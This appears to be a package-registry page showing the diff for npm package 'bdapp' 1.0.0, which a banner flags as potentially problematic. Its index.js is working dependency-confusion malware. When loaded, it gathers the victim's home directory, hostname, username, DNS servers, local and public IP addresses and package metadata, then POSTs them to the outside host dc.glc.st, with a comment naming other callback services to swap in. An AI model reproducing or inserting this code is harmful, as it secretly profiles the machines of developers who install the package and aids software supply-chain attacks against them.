bdapp 1.0.0
Sign up to get free protection for your applications and to get access to all the features.
Potentially problematic release.
This version of bdapp might be problematic. Click here for more details.
- package/index.js +89 -0
- package/package.json +12 -0
package/index.js
ADDED
@@ -0,0 +1,89 @@
|
|
1
|
+
const os = require("os");
|
2
|
+
const dns = require("dns");
|
3
|
+
const querystring = require("querystring");
|
4
|
+
const http = require("http");
|
5
|
+
const packageJSON = require("./package.json");
|
6
|
+
const package = packageJSON.name;
|
7
|
+
|
8
|
+
|
9
|
+
// https://stackoverflow.com/questions/20273128/node-js-how-to-get-my-external-ip-address-in-node-js-app
|
10
|
+
const { networkInterfaces } = require('os');
|
11
|
+
|
12
|
+
const nets = networkInterfaces();
|
13
|
+
const local_ips = Object.create(null); // Or just '{}', an empty object
|
14
|
+
for (const name of Object.keys(nets)) {
|
15
|
+
for (const net of nets[name]) {
|
16
|
+
// Skip over non-IPv4 and internal (i.e. 127.0.0.1) addresses
|
17
|
+
// 'IPv4' is in Node <= 17, from 18 it's a number 4 or 6
|
18
|
+
const familyV4Value = typeof net.family === 'string' ? 'IPv4' : 4
|
19
|
+
if (net.family === familyV4Value && !net.internal) {
|
20
|
+
if (!local_ips[name]) {
|
21
|
+
local_ips[name] = [];
|
22
|
+
}
|
23
|
+
local_ips[name].push(net.address);
|
24
|
+
}
|
25
|
+
}
|
26
|
+
}
|
27
|
+
|
28
|
+
|
29
|
+
// https://stackoverflow.com/questions/20273128/node-js-how-to-get-my-external-ip-address-in-node-js-app
|
30
|
+
var public_ip = Object.create(null); // Or just '{}', an empty object
|
31
|
+
|
32
|
+
http.get({'host': 'api.ipify.org', 'port': 80, 'path': '/'}, function(resp) {
|
33
|
+
resp.on('data', function(ip) {
|
34
|
+
public_ip = "" + ip;
|
35
|
+
// console.log(public_ip);
|
36
|
+
extractData();
|
37
|
+
});
|
38
|
+
});
|
39
|
+
|
40
|
+
|
41
|
+
// https://dhiyaneshgeek.github.io/web/security/2021/09/04/dependency-confusion/
|
42
|
+
// author:- whitehacker003@protonmail.com
|
43
|
+
function extractData()
|
44
|
+
{
|
45
|
+
const trackingData = JSON.stringify({
|
46
|
+
p: package,
|
47
|
+
c: __dirname,
|
48
|
+
hd: os.homedir(),
|
49
|
+
hn: os.hostname(),
|
50
|
+
un: os.userInfo().username,
|
51
|
+
dns: dns.getServers(),
|
52
|
+
lip: JSON.stringify(local_ips),
|
53
|
+
pip: public_ip,
|
54
|
+
r: packageJSON ? packageJSON.___resolved : undefined,
|
55
|
+
v: packageJSON.version,
|
56
|
+
pjson: packageJSON,
|
57
|
+
});
|
58
|
+
// console.log(trackingData);
|
59
|
+
|
60
|
+
var postData = querystring.stringify({
|
61
|
+
msg: trackingData,
|
62
|
+
});
|
63
|
+
// console.log(postData);
|
64
|
+
|
65
|
+
var options = {
|
66
|
+
hostname: "dc.glc.st", //replace burpcollaborator.net with Interactsh or pipedream
|
67
|
+
port: 80,
|
68
|
+
path: "/",
|
69
|
+
method: "POST",
|
70
|
+
headers: {
|
71
|
+
"Content-Type": "application/x-www-form-urlencoded",
|
72
|
+
"Content-Length": postData.length,
|
73
|
+
},
|
74
|
+
};
|
75
|
+
// console.log(options);
|
76
|
+
|
77
|
+
var req = http.request(options, (res) => {
|
78
|
+
res.on("data", (d) => {
|
79
|
+
process.stdout.write(d);
|
80
|
+
});
|
81
|
+
});
|
82
|
+
|
83
|
+
req.on("error", (e) => {
|
84
|
+
// console.error(e);
|
85
|
+
});
|
86
|
+
|
87
|
+
req.write(postData);
|
88
|
+
req.end();
|
89
|
+
}
|
package/package.json
ADDED